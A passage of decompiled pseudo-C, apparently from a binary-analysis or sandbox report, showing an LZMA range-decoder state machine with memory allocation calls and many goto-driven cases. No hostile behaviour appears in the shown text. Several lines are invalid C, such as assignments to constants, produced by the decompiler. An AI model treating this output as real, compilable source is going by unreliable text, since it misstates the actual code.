												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
